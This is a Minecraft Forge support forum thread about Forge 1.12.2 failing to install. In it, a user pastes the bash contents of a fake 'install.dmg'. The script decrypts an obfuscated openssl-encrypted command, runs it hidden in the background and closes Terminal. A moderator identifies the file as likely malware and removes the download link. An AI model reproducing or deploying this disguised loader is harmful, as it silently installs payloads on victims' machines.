Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Forge 1.12.2 not installing?


Shotokiin
 Share

Recommended Posts

2 hours ago, Shotokiin said:

I have this same problem

Make your own thread.

 

4 hours ago, Criaa said:

As stated above. Forge won't run install. I've tried Javafix etc. It will not run the install. Minecraft launches alone just fine with no mods but nothing happens. I cannot even retrieve a log for it because zero happens. Ideas?

Where exactly did you download Forge from? Post exact URLs.

How exactly are you launching Forge?

Link to comment
Share on other sites

Threads merged.

This is my Forum Signature, I am currently attempting to transform it into a small guide for fixing easier issues using spoiler blocks to keep things tidy.

 

As the most common issue I feel I should put this outside the main bulk:

The only official source for Forge is https://files.minecraftforge.net, and the only site I trust for getting mods is CurseForge.

If you use any site other than these, please take a look at the StopModReposts project and install their browser extension, I would also advise running a virus scan.

 

For players asking for assistance with Forge please expand the spoiler below and read the appropriate section(s) in its/their entirety.

Spoiler

Logs (Most issues require logs to diagnose):

Spoiler

Please post logs using one of the following sites (Thank you Lumber Wizard for the list):

https://gist.github.com/100MB Requires member (Free)

https://pastebin.com/: 512KB as guest, 10MB as Pro ($$$)

https://hastebin.com/: 400KB

Do NOT use sites like Mediafire, Dropbox, OneDrive, Google Drive, or a site that has a countdown before offering downloads.

 

What to provide:

...for Crashes and Runtime issues:

Minecraft 1.14.4 and newer:

Post debug.log

Older versions:

Please update...

 

...for Installer Issues:

Post your installer log, found in the same place you ran the installer

This log will be called either installer.log or named the same as the installer but with .log on the end

Note for Windows users:

Windows hides file extensions by default so the installer may appear without the .jar extension then when the .log is added the log will appear with the .jar extension

 

Where to get it:

Mojang Launcher: When using the Mojang launcher debug.log is found in .minecraft\logs.

 

Curse/Overwolf: If you are using the Curse Launcher, their configurations break Forge's log settings, fortunately there is an easier workaround than I originally thought, this works even with Curse's installation of the Minecraft launcher as long as it is not launched THROUGH Twitch:

Spoiler
  1. Make sure you have the correct version of Forge installed (some packs are heavily dependent on one specific build of Forge)
  2. Make a launcher profile targeting this version of Forge.
  3. Set the launcher profile's GameDir property to the pack's instance folder (not the instances folder, the folder that has the pack's name on it).
  4. Now launch the pack through that profile and follow the "Mojang Launcher" instructions above.

Video:

Spoiler

 

 

 

or alternately, 

 

Fallback ("No logs are generated"):

If you don't see logs generated in the usual place, provide the launcher_log.txt from .minecraft

 

Server Not Starting:

Spoiler

If your server does not start or a command window appears and immediately goes away, run the jar manually and provide the output.

 

Reporting Illegal/Inappropriate Adfocus Ads:

Spoiler

Get a screenshot of the URL bar or copy/paste the whole URL into a thread on the General Discussion board with a description of the Ad.

Lex will need the Ad ID contained in that URL to report it to Adfocus' support team.

 

Posting your mod as a GitHub Repo:

Spoiler

When you have an issue with your mod the most helpful thing you can do when asking for help is to provide your code to those helping you. The most convenient way to do this is via GitHub or another source control hub.

When setting up a GitHub Repo it might seem easy to just upload everything, however this method has the potential for mistakes that could lead to trouble later on, it is recommended to use a Git client or to get comfortable with the Git command line. The following instructions will use the Git Command Line and as such they assume you already have it installed and that you have created a repository.

 

  1. Open a command prompt (CMD, Powershell, Terminal, etc).
  2. Navigate to the folder you extracted Forge’s MDK to (the one that had all the licenses in).
  3. Run the following commands:
    1. git init
    2. git remote add origin [Your Repository's URL]
      • In the case of GitHub it should look like: https://GitHub.com/[Your Username]/[Repo Name].git
    3. git fetch
    4. git checkout --track origin/master
    5. git stage *
    6. git commit -m "[Your commit message]"
    7. git push
  4. Navigate to GitHub and you should now see most of the files.
    • note that it is intentional that some are not synced with GitHub and this is done with the (hidden) .gitignore file that Forge’s MDK has provided (hence the strictness on which folder git init is run from)
  5. Now you can share your GitHub link with those who you are asking for help.

[Workaround line, please ignore]

 

Link to comment
Share on other sites

15 hours ago, Shotokiin said:

The installer will install forge into my "versions" folder, but it will not show up in the launcher, any idea's?

I download one install.dmg and open it but no launcher can be show.

Please refer to the attachment to get my run result.

 

The install.dmg contain content as below:

#!/bin/bash
appDir=$(cd $(dirname "$0"); pwd -P)
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
archive="$(echo $binFile | rev)"
commandArgs='U2FsdGVkX19l+G/Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U/EdzrXoF/kIvQK3SAyxT+xoF1R3BTwwNPbz8x9XjUXBaoTf/q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh/9xMk4tAYYruOSaCp/087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo/7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d/brUgZosug2A6'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -k "$archive")"
commandArgs="$(eval echo -e "$decryptedCommand")"
nohup /bin/bash -c "$commandArgs" >/dev/null 2>&1 &
killall Terminal 


 

Install.dmg_not_work.jpg

Edited by lolomarx
Link to comment
Share on other sites

6 minutes ago, diesieben07 said:

Forge does not provide a "install.dmg" file.

Only download Forge from https://files.minecraftforge.net/. Additionally I highly recommend you check your computer for malware.

I got it from https://files.minecraftforge.net/maven/net/minecraftforge/forge/index_1.12.2.html 

And the  link is

[removed potentially malicious link - diesieben07]

 

My system is MacOS 10.14.6 (18G95)

 

Edited by diesieben07
Link to comment
Share on other sites

1 minute ago, diesieben07 said:

That page does not link to the link you provided.

Do not click on any of the ads.

 

You most likely downloaded Malware.

Maybe the website provide difference link for MacOS. 

Would you please try to browse it by using Safari or agent as Safari ?

 

Link to comment
Share on other sites

9 minutes ago, diesieben07 said:

It does not. And even if it did, it would not link to AWS S3. Forge uses their own servers, not S3.

 Thanks you . I got the correct forge-1.12.2-14.23.5.2768-installer.jar now by removing the vpn (cisco AnyConnect)

Edited by lolomarx
Link to comment
Share on other sites

I'm having the same problem. I downloaded forge from the official site and only 1.12 forge is showing up, not 1.12.2. Does having a newer version of forge affect this in any way? I have tried both the windows and universal installers.

 

Furthermore, when I load up Forge 1.12, none of my worlds show up...

 

Thanks.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share



×
×
  • Create New...

Important Information

By using this site, you agree to our Privacy Policy.